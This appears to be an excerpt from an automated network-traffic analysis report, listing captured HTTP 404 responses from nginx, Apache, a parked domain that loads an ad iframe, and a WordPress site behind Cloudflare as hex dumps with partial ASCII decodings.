77 34 31 6c 30 6d 4a 6f 69 7a 70 47 55 62 6f 39 7a 6f 76 77 32 75 36 45 53 39 79 73 78 61 6e 48 65 54 6f 54 39 6d 46 78 6b 38 5a 49 34 4c 45 35 6b 28 46 6e 6e 6e 63 72 70 28 45 7e 7a 31 54 45 76 76 33 75 6e 75 73 63 38 4f 45 51 50 4b 4a 6a 69 4f 72 7
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 18 Feb 2023 12:03:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:06:43 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:06:46 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:06:49 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:06:54 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:06:57 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:07:00 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:07:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://ladybillplanet.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 79b6a4381e24690a-FRAContent-Encoding: gzipData Raw: 32 33 38 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d db 8e dc 46 96 e0 b3 ea 2b 42 14 4a 95 69 93 4c de f3 56 99 6e 5b 96 dd 5e cb 97 b5 e4 35 ba 65 41 88 24 23 33 a9 62 92 34 23 b2 b2 ca e5 04 fa a1 1f 06 8b 05 e6 61 dc c0 62 d7 33 98 79 58 60 5f 16 e8 dd e9 dd e9 87 de fd 20 cb fd 0f 8b 13 11 64 92 99 cc 4b 55 49 c6 60 ac 12 54 45 46 9c 5b 9c 38 71 e2 c4 95 a7 77 df ff ec c1 93 df 7c fe 10 4d d9 2c 1a 1e 9d c2 1f 14 e1 78 32 50 ce 12 ed e3 2f 14 48 23 38 18 1e dd 39 9d 11 86 91 3f c5 19 25 6c a0 7c f9 e4 03 ad a3 14 e9 31 9e 91 c1 49 96 8c 12 46 4f 90 9f c4 8c c4 6c 70 12 27 61 1c 90 0b 15 8d 93 28 4a 16 27 a8 35 3c 2a 21 28 e7 21 59 a4 49 c6 94 02 45 59 84 01 9b 